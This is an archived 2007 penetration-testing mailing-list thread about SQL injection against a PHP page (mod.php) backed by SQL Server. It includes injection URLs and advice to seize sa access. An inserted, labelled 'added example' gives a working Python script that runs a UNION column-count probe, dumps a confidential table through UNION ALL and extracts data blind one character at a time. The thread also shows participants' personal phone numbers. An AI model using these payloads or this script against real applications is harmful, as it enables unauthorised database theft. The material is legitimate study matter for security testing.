RE: SQL Injection- Bypassing magic_quotes



I think UNION requires columns of the same type. Do you have that type
of information? Do you happen to know (or can guess) what query is being
executed by mod.php? If you could share the query string you are using
to bypass magic_quotes and the results you get I might have some more
concrete ideas.

In raw SQL you can add a query at the WHERE level, but it may be useless
to you. A very simple example that probably won't return the results you
want, but you may catch my drift:

-- subquery in the WHERE clause; an IN list needs a single-column subquery
SELECT * FROM app_users
WHERE user_id = 1 OR message IN (SELECT message FROM messages)

-Leo Walsh, GSNA
Jefferson Wells International
816-627-4222 (office)
913-484-8051 (cell)
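The mechanics the two of us are circling, as an added example that is not part of this thread: a stand-in for mod.php's single odbc_exec() call, built on Python's sqlite3 so it runs offline. The schema (app_users, messages and their columns) is an assumption, since the real schema behind mod.php is unknown. sqlite3's refusal to run two statements in one execute() is only an analogue for the ODBC driver's "Connection is busy with results for another hstmt" error, not the same mechanism; what the two share is that the stacked second statement never returns rows. The example then does what that refusal forces: it finds the column count of the original SELECT with UNION SELECT NULL, folds the messages table into mod.php's own result set with UNION ALL and CAST so the column types line up, and, for the WHERE-level subquery that prints nothing by itself, uses it as a yes/no oracle to pull a message body out one character at a time.

```python
# Added example, not code from the thread. sqlite3 stands in for the SQL
# Server 2005 backend so this runs offline; table and column names
# (app_users, messages, id/username/email, id/author/body) are assumptions.
import sqlite3


def build_db():
    """Constructed sample data: an in-memory copy of the guessed schema."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE app_users (id INTEGER, username TEXT, email TEXT);
        CREATE TABLE messages  (id INTEGER, author TEXT, body TEXT);
        INSERT INTO app_users VALUES (1, 'alice', 'alice@example.test');
        INSERT INTO app_users VALUES (2, 'bob',   'bob@example.test');
        INSERT INTO messages  VALUES (10, 'alice', 'confidential memo one');
        INSERT INTO messages  VALUES (11, 'bob',   'confidential memo two');
    """)
    return con


def mod_php(con, id_param):
    """Stand-in for mod.php: one string-built query, one execute() call.
    The quote filter is already bypassed in the thread, so none is modelled."""
    sql = "SELECT id, username, email FROM app_users WHERE id = '%s'" % id_param
    return con.execute(sql).fetchall()


def stacked_query(con):
    """Append a second statement after a ';'. sqlite3 refuses more than one
    statement per execute(); that refusal plays the role of the ODBC
    driver's 'Connection is busy with results for another hstmt' error.
    Either way the second query's rows never come back through mod.php."""
    try:
        mod_php(con, "1'; SELECT * FROM messages--")
        return "second statement ran"
    except (sqlite3.Warning, sqlite3.ProgrammingError) as e:
        return "refused: %s" % e


def column_count(con, max_cols=8):
    """Find the width of mod.php's SELECT: UNION SELECT NULL,... only parses
    when the column count matches, and NULL is compatible with every column
    type, so the type question is deferred until the count is known."""
    for n in range(1, max_cols + 1):
        try:
            mod_php(con, "1' UNION SELECT " + ", ".join(["NULL"] * n) + "--")
            return n
        except sqlite3.OperationalError:
            continue  # wrong count; SQL Server reports the same case as msg 205
    return None


def dump_messages(con):
    """Fold the confidential table into mod.php's own result set. Each
    messages column is CAST to a string so the types match the first SELECT
    (the 'UNION requires columns of the same type' point); surplus positions
    are padded with NULL. AND 1=0 drops the original rows."""
    n = column_count(con)
    cols = ["CAST(id AS varchar(10))", "author", "body"]
    cols += ["NULL"] * (n - len(cols))
    payload = "1' AND 1=0 UNION ALL SELECT " + ", ".join(cols) + " FROM messages--"
    return mod_php(con, payload)


def blind_extract(con, msg_id, length):
    """A WHERE-level subquery prints nothing, but it is a yes/no oracle: the
    row for id=1 comes back only when the guessed character is right.
    One character per request. (T-SQL spells substr as SUBSTRING.)"""
    charset = "abcdefghijklmnopqrstuvwxyz "
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            probe = ("1' AND (SELECT substr(body, %d, 1) FROM messages "
                     "WHERE id = %d) = '%s'--" % (pos, msg_id, ch))
            if mod_php(con, probe):
                out += ch
                break
        else:
            break  # character not in charset; stop rather than guess
    return out


if __name__ == "__main__":
    db = build_db()
    print(stacked_query(db))
    print("columns:", column_count(db))
    for row in dump_messages(db):
        print(row)
    print(blind_extract(db, 10, 12))
```

Against SQL Server the same payloads carry over with SUBSTRING in place of substr; a UNION with the wrong column count fails there with msg 205 ("All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists"), which is exactly the signal column_count() loops on.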

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of Danux
Sent: Wednesday, October 10, 2007 8:00 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: Re: SQL Injection- Bypassing magic_quotes

Good, Leo, but sadly I have already taken those steps; the backend is a
SQL Server 2005, so xp_cmdshell and others are disabled. I only want to
print a confidential table in order to show that it's important to fix
it.

I think the MSSQL connection handler is executed by the first mod.php
query, so when trying to execute the second one it says the handler is
already used, so... I need a way to execute a second query through the
first one, with UNION or something like that, or, as Geoff said, a way
to stop executing the first query (mod.php) so that the connection
handler is not used and I can execute the second one of mine (SQL
injection).

What do you think?

On 10/10/07, Walsh, Leo <Leo_Walsh@xxxxxxxxxxxxxxxxxx> wrote:
I would try a couple of things, if you haven't already.

1) If you aren't actually interested in the results that are obtained
from the query performed by mod.php, then skip it. Your 1=1 selection
criteria might be eating up too much time. From the looks of your
query string it seems that you can bypass whatever filtering they are
doing without using 1=1.

2) Try selecting something much smaller than the entire messages
table. This is a table that might be quite large. Try selecting a
single row, or message where date > somedate (which you may have to
convert to a binary value, by the way). If you know another table name
then try that.

3) Try using a SQL Injection tool to gain sa access. Depending on the
purpose of your investigation gaining sa should be enough to
demonstrate a severe vulnerability that should be mitigated
immediately.


-Leo Walsh, GSNA
Jefferson Wells International
816-627-4222 (office)
913-484-8051 (cell)

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of Danux
Sent: Tuesday, October 09, 2007 7:25 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: Re: SQL Injection- Bypassing magic_quotes

Hi, well, after taking some examples from you (thanks in advance), I
am able to bypass single quotes, so I can inject something as simple as:

http://www.site.com/mod.php?id=1%27%20or%201=1--

But now, when trying to print a full table with the following
injection:

http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;--

there is a warning saying that the connection is busy:


Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
SQL Server Driver]Connection is busy with results for another hstmt,
SQL state S1000 in SQLExecDirect in .........mod.php

So, I think I need a way to execute the second query (mine) before the
one that mod.php executes by itself (mod.php?id=1).

What do you think?

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------






--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
